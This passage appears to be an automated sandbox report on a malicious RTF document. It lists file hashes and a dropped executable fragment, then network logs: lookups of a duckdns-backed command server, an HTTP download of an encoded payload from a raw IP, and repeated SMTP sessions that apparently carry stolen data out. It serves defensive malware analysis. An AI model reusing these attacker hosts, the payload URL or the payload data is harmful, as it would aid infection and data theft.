                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.........."...0.............n:... ...@....@.. ...............................k....`..................................:..O....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................P:......H........F..\...................P .......................................................................................................................................................................*.r...p(I........sJ........r...p.....sK........*.r...p......%.r...p.%.r'..p.%.r...p.(m...*.r...p......%.r...p.%.r/..p.%.r'..p.%.r...p.(m...*.r...p......%.r3..p.%.rO..p.%.r3..p.%.rC..p.(m...*. ....*.~....%:....&.l...(....sr...%.....*2r...p.(G...*2r...p.(G...*2r4..p.(G...*2rf..p.(
                                                                          C:\Users\user\Desktop\~$cumenting.doc
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.431160061181642
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                          MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                          SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                          SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                          SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                                                          Static File Info

                                                                          General

                                                                          File type:Rich Text Format data, unknown version
                                                                          Entropy (8bit):4.006202656120195
                                                                          TrID:
                                                                          • Rich Text Format (5005/1) 55.56%
                                                                          • Rich Text Format (4004/1) 44.44%
                                                                          File name:documenting.doc
                                                                          File size:362048
                                                                          MD5:968781deb16a336c2fdda28c2ae1d7d6
                                                                          SHA1:719ba0ec5623e1ee351fbf5ce8df4d0ad70d7939
                                                                          SHA256:980a17c08dcaac6b16180863a7cd8a92b636622f513fd2847613b660a547ce71
                                                                          SHA512:cc70b84ef54c9f8e4980ee19b48b7b0d782fafebff518849e483f87a51820fe67ac0d1593b35f79d57785903185c8b83e2567f316b489d982ed8993fc3d72aec
                                                                          SSDEEP:6144:yBUYsYsCyvCSCGPHu4OIVEyZBU0PVToM7ZlQ/SfmCe2f8Clvn2PHugnbuY:k5gE4sGJfoavbf8SETbuY
                                                                          File Content Preview:{\rtf6613{\object52122834 52122834\objhtml\objw7538\objh7339{\*\objdata824551 {\qmspace1059230324.1059230324\.1059230324 \qmspace1059230324.1059230324\.10592

                                                                          File Icon

                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                          Static RTF Info

                                                                          Objects

                                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                          00000005Chno

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 27, 2021 19:06:00.143651009 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:00.228924990 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:00.229171038 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:00.237487078 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:00.325206995 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:00.337997913 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:00.338027000 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:00.338036060 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:00.338259935 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:00.373532057 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:00.466480970 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:00.466660976 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.139199972 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.266300917 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431827068 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431859970 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431875944 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431890965 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431906939 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431926966 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431945086 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431962013 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.431988001 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.432039976 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.432104111 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.440310001 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.440340042 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.440496922 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.517515898 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.517560959 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.517812014 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.521502018 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.521509886 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.521745920 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.527726889 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.527776003 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.527947903 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.531090975 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.531135082 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.531289101 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.536196947 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.536237955 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.536468983 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.540160894 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.540328979 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.540963888 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.540982962 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.544681072 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.544847965 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.544965982 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.545037985 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.549205065 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.549228907 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.549355030 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.553769112 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.553795099 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.553875923 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.554079056 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.558250904 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.558276892 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.558419943 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.603355885 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.603389025 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.603707075 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.605678082 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.605721951 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.605926037 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.609855890 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.609908104 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.610091925 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.613465071 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.613496065 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.613670111 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.617147923 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.617187023 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.617212057 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.617238998 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.617265940 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.617269993 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.620110989 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.620146036 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.620239019 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.623469114 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.623507023 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.623627901 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.626575947 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.626610994 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.626719952 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.629618883 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.629657030 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.629772902 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.632544994 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.632674932 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.632705927 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.632729053 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.635818005 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.635858059 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.635973930 CET49165443192.168.2.22172.111.202.41
                                                                          Jan 27, 2021 19:06:02.637929916 CET44349165172.111.202.41192.168.2.22
                                                                          Jan 27, 2021 19:06:02.637959003 CET44349165172.111.202.41192.168.2.22

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 27, 2021 19:05:59.848138094 CET5219753192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:00.070969105 CET53521978.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:00.071597099 CET5219753192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:00.127852917 CET53521978.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:00.811233997 CET5309953192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:00.859194994 CET53530998.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:00.863379955 CET5283853192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:00.913701057 CET53528388.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:01.458731890 CET6120053192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:01.516509056 CET53612008.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:01.521289110 CET4954853192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:01.579101086 CET53495488.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:44.975883007 CET5562753192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:45.027533054 CET53556278.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:52.497445107 CET5600953192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:52.557728052 CET53560098.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:06:52.558322906 CET5600953192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:06:52.614574909 CET53560098.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:07:01.812661886 CET6186553192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:07:01.861634970 CET53618658.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:07:11.970073938 CET5517153192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:07:12.021878004 CET53551718.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:07:18.006704092 CET5249653192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:07:18.055160999 CET53524968.8.8.8192.168.2.22
                                                                          Jan 27, 2021 19:07:26.508097887 CET5756453192.168.2.228.8.8.8
                                                                          Jan 27, 2021 19:07:26.557590008 CET53575648.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Jan 27, 2021 19:05:59.848138094 CET192.168.2.228.8.8.80x82b3Standard query (0)cy.kl-re.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:00.071597099 CET192.168.2.228.8.8.80x82b3Standard query (0)cy.kl-re.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:44.975883007 CET192.168.2.228.8.8.80xa163Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:52.497445107 CET192.168.2.228.8.8.80xd517Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:52.558322906 CET192.168.2.228.8.8.80xd517Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:01.812661886 CET192.168.2.228.8.8.80xd9fbStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:11.970073938 CET192.168.2.228.8.8.80x5cccStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:18.006704092 CET192.168.2.228.8.8.80x1bacStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:26.508097887 CET192.168.2.228.8.8.80xe37eStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jan 27, 2021 19:06:00.070969105 CET8.8.8.8192.168.2.220x82b3No error (0)cy.kl-re.comcybersng.duckdns.orgCNAME (Canonical name)IN (0x0001)
                                                                          Jan 27, 2021 19:06:00.070969105 CET8.8.8.8192.168.2.220x82b3No error (0)cybersng.duckdns.org172.111.202.41A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:00.127852917 CET8.8.8.8192.168.2.220x82b3No error (0)cy.kl-re.comcybersng.duckdns.orgCNAME (Canonical name)IN (0x0001)
                                                                          Jan 27, 2021 19:06:00.127852917 CET8.8.8.8192.168.2.220x82b3No error (0)cybersng.duckdns.org172.111.202.41A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:45.027533054 CET8.8.8.8192.168.2.220xa163No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:52.557728052 CET8.8.8.8192.168.2.220xd517No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:06:52.614574909 CET8.8.8.8192.168.2.220xd517No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:01.861634970 CET8.8.8.8192.168.2.220xd9fbNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:12.021878004 CET8.8.8.8192.168.2.220x5cccNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:18.055160999 CET8.8.8.8192.168.2.220x1bacNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                          Jan 27, 2021 19:07:26.557590008 CET8.8.8.8192.168.2.220xe37eNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • 193.239.147.103

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.2249168193.239.147.10380C:\Users\user\AppData\Roaming\RegAskcfcd.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 27, 2021 19:06:03.686017990 CET151OUTGET /base/D6BA86F557F0B3BF28711AA5C7497D8B.html HTTP/1.1
                                                                          Host: 193.239.147.103
                                                                          Connection: Keep-Alive
                                                                          Jan 27, 2021 19:06:03.735656023 CET152INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Wed, 27 Jan 2021 18:06:03 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 893563
                                                                          Last-Modified: Tue, 26 Jan 2021 22:59:48 GMT
                                                                          Connection: keep-alive
                                                                          Vary: Accept-Encoding
                                                                          ETag: "60109ee4-da27b"
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 3c 70 3e 42 42 52 73 62 52 48 66 66 52 62 52 78 52 62 52 62 52 62 52 66 52 62 52 62 52 62 52 70 4c 4c 52 70 4c 4c 52 62 52 62 52 48 4b 66 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 55 66 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 48 70 4b 52 62 52 62 52 62 52 48 66 52 78 48 52 48 4b 55 52 48 66 52 62 52 48 4b 62 52 73 52 70 62 4c 52 78 78 52 48 4b 66 52 48 52 42 55 52 70 62 4c 52 78 78 52 4b 66 52 48 62 66 52 48 62 4c 52 48 48 4c 52 78 70 52 48 48 70 52 48 48 66 52 48 48 48 52 48 62 78 52 48 48 66 52 73 42 52 48 62 73 52 78 70 52 73 73 52 73 42 52 48 48 62 52 48 48 62 52 48 48 48 52 48 48 55 52 78 70 52 73 4b 52 48 62 48 52 78 70 52 48 48 66 52 48 48 42 52 48 48 62 52 78 70 52 48 62 4c 52 48 48 62 52 78 70 52 55 4b 52 42 73 52 4b 78 52 78 70 52 48 62 73 52 48 48 48 52 48 62 62 52 48 62 48 52 66 55 52 48 78 52 48 78 52 48 62 52 78 55 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 4b 62 52 55 73 52 62 52 62 52 42 55 52 48 52 78 52 62 52 70 70 4c 52 48 4c 4b 52 48 55 52 73 55 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 70 70 66 52 62 52 78 66 52 62 52 48 48 52 48 52 4b 62 52 62 52 62 52 70 70 4b 52 78 52 62 52 62 52 55 52 62 52 62 52 62 52 62 52 62 52 62 52 48 73 62 52 70 52 66 52 62 52 62 52 78 70 52 62 52 62 52 62 52 78 70 52 66 52 62 52 62 52 62 52 62 52 48 55 52 62 52 78 70 52 62 52 62 52 62 52 70 52 62 52 62 52 66 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 55 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 73 55 52 66 52 62 52 62 52 70 52 62 52 62 52 62 52 62 52 62 52 62 52 70 52 62 52 73 55 52 48 78 78 52 62 52 62 52 48 55 52 62 52 62 52 48 55 52 62 52 62 52 62 52 62 52 48 55 52 62 52 62 52 48 55 52 62 52 62 52 62 52 62 52 62 52 62 52 48 55 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 48 62 62 52 70 52 66 52 62 52 4b 42 52 62 52 62 52 62 52 62 52 78 70 52 66 52 62 52 4b 4b 52 78 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 55 66 52 66 52 62 52 48 70 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 78 70 52 62 52 62 52 4b 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 4b 52 78 70 52 62 52 62 52 42 70 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 66 55 52 48 48 55 52 48 62 48 52 48 70 62 52 48 48 55 52 62 52 62 52 62 52 48 73 55 52 70 70 55 52 78 52 62 52 62 52 78 70 52 62 52 62 52 62 52 70 70 4b 52 78 52 62 52 62 52 70 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 62 52 78 70 52 62 52 62 52 73 55 52 66 55 52 48 48 66 52 48 48 4c 52 48 48 66 52 73 73 52 62 52 62 52 62 52 4b 4b 52 78 52 62 52 62 52 62 52 78 70 52 66 52 62 52 62 52 66 52 62 52 62 52 62 52 70 78
                                                                          Data Ascii: <p>BBRsbRHffRbRxRbRbRbRfRbRbRbRpLLRpLLRbRbRHKfRbRbRbRbRbRbRbRUfRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRHpKRbRbRbRHfRxHRHKURHfRbRHKbRsRpbLRxxRHKfRHRBURpbLRxxRKfRHbfRHbLRHHLRxpRHHpRHHfRHHHRHbxRHHfRsBRHbsRxpRssRsBRHHbRHHbRHHHRHHURxpRsKRHbHRxpRHHfRHHBRHHbRxpRHbLRHHbRxpRUKRBsRKxRxpRHbsRHHHRHbbRHbHRfURHxRHxRHbRxURbRbRbRbRbRbRbRKbRUsRbRbRBURHRxRbRppLRHLKRHURsURbRbRbRbRbRbRbRbRppfRbRxfRbRHHRHRKbRbRbRppKRxRbRbRURbRbRbRbRbRbRHsbRpRfRbRbRxpRbRbRbRxpRfRbRbRbRbRHURbRxpRbRbRbRpRbRbRfRbRbRbRbRbRbRbRURbRbRbRbRbRbRbRbRsURfRbRbRpRbRbRbRbRbRbRpRbRsURHxxRbRbRHURbRbRHURbRbRbRbRHURbRbRHURbRbRbRbRbRbRHURbRbRbRbRbRbRbRbRbRbRbRHbbRpRfRbRKBRbRbRbRbRxpRfRbRKKRxRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRUfRfRbRHpRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRbRxpRbRbRKRbRbRbRbRbRbRbRbRbRbRbRKRxpRbRbRBpRbRbRbRbRbRbRbRbRbRbRbRfURHHURHbHRHpbRHHURbRbRbRHsURppURxRbRbRxpRbRbRbRppKRxRbRbRpRbRbRbRbRbRbRbRbRbRbRbRbRbRbRxpRbRbRsURfURHHfRHHLRHHfRssRbRbRbRKKRxRbRbRbRxpRfRbRbRfRbRbRbRpx


                                                                          HTTPS Packets

                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                          Jan 27, 2021 19:06:00.338027000 CET172.111.202.41443192.168.2.2249165CN=cy.kl-re.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 10 06:18:02 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 10 07:18:02 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                          SMTP Packets

                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                          Jan 27, 2021 19:06:45.442003965 CET58749169198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                          Jan 27, 2021 19:06:45.444129944 CET49169587192.168.2.22198.54.122.60EHLO 287400
                                                                          Jan 27, 2021 19:06:45.637871027 CET58749169198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                          250-PIPELINING
                                                                          250-SIZE 81788928
                                                                          250-ETRN
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250 STARTTLS
                                                                          Jan 27, 2021 19:06:45.644351006 CET49169587192.168.2.22198.54.122.60STARTTLS
                                                                          Jan 27, 2021 19:06:45.837701082 CET58749169198.54.122.60192.168.2.22220 Ready to start TLS
                                                                          Jan 27, 2021 19:06:53.005856991 CET58749170198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                          Jan 27, 2021 19:06:53.008559942 CET49170587192.168.2.22198.54.122.60EHLO 287400
                                                                          Jan 27, 2021 19:06:53.202301979 CET58749170198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                          250-PIPELINING
                                                                          250-SIZE 81788928
                                                                          250-ETRN
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250 STARTTLS
                                                                          Jan 27, 2021 19:06:53.203018904 CET49170587192.168.2.22198.54.122.60STARTTLS
                                                                          Jan 27, 2021 19:06:53.396245003 CET58749170198.54.122.60192.168.2.22220 Ready to start TLS
                                                                          Jan 27, 2021 19:07:02.274887085 CET58749171198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                          Jan 27, 2021 19:07:02.275391102 CET49171587192.168.2.22198.54.122.60EHLO 287400
                                                                          Jan 27, 2021 19:07:02.481498957 CET58749171198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                          250-PIPELINING
                                                                          250-SIZE 81788928
                                                                          250-ETRN
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250 STARTTLS
                                                                          Jan 27, 2021 19:07:02.485548973 CET49171587192.168.2.22198.54.122.60STARTTLS
                                                                          Jan 27, 2021 19:07:02.690128088 CET58749171198.54.122.60192.168.2.22220 Ready to start TLS
                                                                          Jan 27, 2021 19:07:12.414186954 CET58749172198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                          Jan 27, 2021 19:07:12.414632082 CET49172587192.168.2.22198.54.122.60EHLO 287400
                                                                          Jan 27, 2021 19:07:12.607489109 CET58749172198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                          250-PIPELINING
                                                                          250-SIZE 81788928
                                                                          250-ETRN
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250 STARTTLS
                                                                          Jan 27, 2021 19:07:12.620254993 CET49172587192.168.2.22198.54.122.60STARTTLS
                                                                          Jan 27, 2021 19:07:12.814969063 CET58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                          Jan 27, 2021 19:07:18.466711044 CET58749173198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                          Jan 27, 2021 19:07:18.467082024 CET49173587192.168.2.22198.54.122.60EHLO 287400
                                                                          Jan 27, 2021 19:07:18.672976017 CET58749173198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                          250-PIPELINING
                                                                          250-SIZE 81788928
                                                                          250-ETRN
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250 STARTTLS
